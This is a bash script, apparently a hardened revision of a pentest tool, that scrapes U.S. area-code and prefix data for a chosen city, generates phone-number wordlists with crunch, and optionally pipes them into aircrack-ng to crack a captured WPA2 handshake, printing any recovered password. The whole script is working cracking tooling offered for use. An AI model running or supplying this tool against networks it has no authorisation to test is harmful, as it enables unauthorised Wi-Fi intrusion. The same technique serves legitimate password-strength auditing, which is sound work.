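#!/usr/bin/env bash
#######################################
# U.S. Phone Number Generator by DERV #
#######################################
#
# revision 4 changes:
#  -removes duplicates for numbers that don't contain the area code (prefix only)
#
# revision 3 changes:
#  -aircrack-ng passthrough for WPA cracking (saves time/space)
#    -key is outputted to aircrack.txt and script stops immediately if key is found
#
# revision 2 changes:
#  -menu system to output certain phone number formats
#  -corrected error for cities with spaces in the name
#
# uses CRUNCH to generate mostly valid phone numbers
# crunch can be found here: http://sourceforge.net/projects/crunch-wordlist/
#
# Flow: prompt for a city and an output format, download the area-code/prefix
# list for that city, then have crunch append the last four digits to every
# prefix. Output goes to phone.txt or, when a capture file is given, is piped
# into aircrack-ng.
#
# Files written in the current directory: phone.txt, aircrack.txt
#
############################################################################

# Scratch files live in a private mktemp directory. Fixed names under /tmp can
# be pre-created or symlinked by another local user, which would let them feed
# lines into this script or redirect its writes to a file of their choosing.
WORKDIR=""

# Remove the scratch directory; registered on EXIT so it runs on every path.
cleanup() {
  if [[ -n "$WORKDIR" ]]; then
    rm -rf -- "$WORKDIR"
  fi
}
trap cleanup EXIT

# trap term/keyboard interrupt signals
# Exits non-zero so a caller can tell an aborted run from a finished one;
# the EXIT trap above still removes the scratch directory.
ITSATRAP() {
  echo ""
  echo "Keyboard interrupt; exiting."
  exit 1
}
trap ITSATRAP INT
trap ITSATRAP TERM

# path and filename of 'crunch' -- wordlist generator
CRUNCH="/pentest/passwords/crunch/./crunch"
if [[ ! -f "$CRUNCH" ]]; then
  echo ""
  echo "[!] Path to crunch not found! ($CRUNCH)"
  echo "[!] Please edit the CRUNCH variable in phone.sh to the correct path to Crunch"
  exit 1
fi

# intro
echo ""
echo "[-] U.S. Phone Number Generator by DERV"
echo ""

echo -n "[+] Enter a U.S. City (e.g. chicago): "
read -r CITY

# website we use can't have spaces -- needs plus-signs (+) instead
# NOTE(review): spaces are the only characters encoded; anything else typed
# here reaches the query string unchanged.
CITY=${CITY// /+}

# menu
echo ""
echo "[-] Select the format for the phone numbers:"
echo ""
echo "    1) (555)555-5555 [13 chars]"
echo "    2) 555-555-1234  [12 chars]"
echo "    3) 5555555555    [10 chars]"
echo "    4) 555-1234      [ 8 chars]"
echo "    5) 5551234       [ 7 chars]"
echo ""
echo -n "[+] Enter a number between 1 and 5: "

read -r STYLE
# Accept exactly one digit 1-5. A pattern match is used instead of -lt/-gt
# because [[ ]] evaluates the operands of numeric operators as arithmetic
# expressions, which raw keyboard input should never reach. It also rejects
# values such as "03" that passed the old range test but matched no format.
case "$STYLE" in
  [1-5]) ;;
  *)
    echo ""
    echo "[!] Invalid menu number; exiting."
    exit 1
    ;;
esac

# wpa passthrough question
# CAP stays empty unless a readable capture file is supplied; an empty CAP
# means "write phone.txt only, no passthrough".
CAP=""
ESSID=""
echo ""
echo "[?] Do you want to passthrough the phone numbers into "
echo -n "     aircrack-ng to crack a WPA handshake capture file? (y/n): "

read -r ANS
if [[ "$ANS" == "y" ]]; then
  # get .cap path
  echo ""
  echo -n "[+] Enter path to the .cap file containing WPA2 handshake: "
  read -r CAP
  if [[ ! -f "$CAP" ]]; then
    # report the path the user typed BEFORE clearing it, so the message is useful
    echo ""
    echo "[!] CAP file '${CAP}' not found; defaulting output to phone.txt"
    CAP=""
  else
    # cap file exists, get the ESSID
    echo ""
    echo -n "[+] Enter the ESSID of the access point: "
    read -r ESSID
  fi
  # a stale key file would make the loop below stop before trying anything
  rm -f aircrack.txt
fi

# get html from site
echo ""
echo "[-] Gathering area-code and prefix information from web..."

WORKDIR=$(mktemp -d) || {
  echo ""
  echo "[!] Unable to create a temporary directory; exiting"
  exit 1
}
PAGE="${WORKDIR}/page.txt"
PREFIXES="${WORKDIR}/prefixes.txt"

# The URL is quoted so '?' is not a glob and the city cannot be word-split into
# extra wget arguments. The page is fetched over plain HTTP, so its content is
# treated as untrusted and validated below before being used as an argument.
wget -O "$PAGE" "http://www.melissadata.com/lookups/phonelocation.asp?number=${CITY}"

if [[ ! -s "$PAGE" ]]; then
  echo ""
  echo "[!] Unable to access phone numbers for city '${CITY}'; exiting"
  exit 1
fi

# 1st awk: keep what follows "?number=" on each line.
# 2nd awk: strip the end of the number (the trailing '0000"' and the rest).
# grep:    keep only lines that are exactly six digits (area code + prefix).
#          This drops blank lines and anything else in the response that is
#          not a prefix, so no scraped text reaches the crunch command line.
awk ' BEGIN {FS = "?number=" } {print $2} ' "$PAGE" \
  | awk ' BEGIN {FS = "0000\"" } {print $1} ' \
  | grep -E '^[0-9]{6}$' > "$PREFIXES"

if [[ "$STYLE" == [45] ]]; then
  # don't need area code! drop the first three digits, then de-duplicate
  # because several area codes can share the same prefix
  cut -c4- "$PREFIXES" | sort -u > "${WORKDIR}/short.txt"
  PREFIXES="${WORKDIR}/short.txt"
fi

if [[ ! -s "$PREFIXES" ]]; then
  echo ""
  echo "[!] No area-code/prefix data found for city '${CITY}'; exiting"
  exit 1
fi

# get rid of previous phone.txt file (so we don't concatenate)
# ':' truncates without writing the empty first line that 'echo ""' left behind
: > phone.txt

# at this point, $PREFIXES contains all of the area codes and prefixes for the city

# loop through every areacode/prefix
while read -r Line; do
  # if we are passing through to aircrack and we've cracked it, stop!
  if [[ -n "$CAP" && -f "aircrack.txt" ]]; then
    break
  fi

  # formats the line to fit the style; LEN is the full length of one number
  case "$STYLE" in
    1)
      # Style: (###)###-@@@@
      Line="(${Line:0:3})${Line:3}-"
      LEN=13
      ;;
    2)
      # Style: ###-###-@@@@
      Line="${Line:0:3}-${Line:3}-"
      LEN=12
      ;;
    3)
      # Style: ######@@@@ (nothing changes)
      LEN=10
      ;;
    4)
      # Style: ###-@@@@
      Line="${Line}-"
      LEN=8
      ;;
    5)
      # Style: ###@@@@ (nothing changes)
      LEN=7
      ;;
  esac

  # now that we know the format, see if we are passing through to aircrack or phone.txt
  # Every expansion is quoted so a path or ESSID containing spaces stays one argument.
  if [[ -n "$CAP" ]]; then
    # cap file exists, need to pass through to aircrack
    echo "[-] Passing through to aircrack: ${Line}####..."
    "$CRUNCH" "$LEN" "$LEN" 0123456789 -t "${Line}@@@@" \
      | aircrack-ng -l aircrack.txt -w - -e "$ESSID" "$CAP"
  else
    # no cap file, just output to phone.txt
    echo "[-] Creating phone numbers for areacode/prefix: ${Line}..."
    "$CRUNCH" "$LEN" "$LEN" 0123456789 -t "${Line}@@@@" >> phone.txt
  fi
done < "$PREFIXES"

# the temporary directory holding the area codes/prefixes is removed by the EXIT trap

if [[ -n "$CAP" ]]; then
  # if we were trying to passthrough
  echo -n "[!] Finished! "

  if [[ -f "aircrack.txt" ]]; then
    # if we cracked it
    echo "Password found: $(cat aircrack.txt)"
  else
    # if we didn't crack it
    echo "Password not found."
  fi

else
  # if we were just generating phone numbers
  echo "[!] Finished!; results are saved in 'phone.txt'"
fi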